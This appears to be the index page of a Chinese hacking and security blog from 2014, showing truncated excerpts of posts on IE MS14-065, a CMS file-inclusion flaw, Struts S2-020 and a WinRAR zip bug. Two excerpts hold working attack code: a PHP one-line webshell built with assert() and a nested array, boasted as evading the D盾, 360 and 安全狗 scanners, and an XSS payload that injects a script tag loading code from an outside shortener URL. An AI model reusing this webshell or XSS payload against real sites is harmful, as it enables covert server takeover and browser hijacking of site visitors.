admin 发布于 2014-11-14 00:57
MS14-065 包含了一序列的IE漏洞,其中最严重的在用户在查看特定网页时
允许远程执行代码。成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。
影响系统:2003(SP2)、Vista_32/64(SP2)、Win7_32/64(SP1)、Win8_32/64、Win8.1_32/64
目前官方已经推送了...
admin 发布于 2014-11-13 12:17
首先还是老地方:archive_act.php(611行)
function respond_action() {
include_once ROOT . '/lib/plugins/pay/' . front::$get['code'] . '.php';
$payclassname = front::$g...
admin 发布于 2014-10-19 11:47
D盾,他不认识二维数组,所以就很轻松绕过了。 对了 还有360哦~ 测试了下安全狗,也查不出来,,。
<?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['whirlwind']); //密码whirlwi...
admin 发布于 2014-10-04 08:07
最近发现有不少2003登陆进去的时候,显示什么国防部啊,输入的用户名也不叫用户名了,叫国防部用户,密码也不叫密码了,叫国防部秘钥。
本文原创,转载留请带版权,谢谢合作。HTTP://NMAP.CC
如图:
那叫个装逼啊。
下面我把方法告诉大家,首先把system32下的m...
admin 发布于 2014-10-03 03:20
<img src=x onerror=document.body.appendChild(createElement('script')).src='http://126.am/ia8Vp4'>
onerror="with(document)body.appendChild(createElement('script'))....
admin 发布于 2014-04-04 06:55
作者:neobyte
时间:2014-04-03
Struts S2-020这个通告已经公布有一段时间了。目前大家都知道这个漏洞可以造成DOS、文件下载等危害,相信各大厂商也已经采取了相应的安全措施。今天是和大家分享一下对这个漏洞的一点研究,包括如何在To...
admin 发布于 2014-04-02 10:50
介绍
WinRar 是常用的压缩与解压缩软件工具。它能将数据压缩成.rar或则.zip格式的包。这篇文章就是给大家呈现Winrar 4.20的一个最新漏洞(0 day),下面是关于zip文件的相关简要介绍。
Offset
Bytes
Description[25]
00 4 Local file header signature = ...
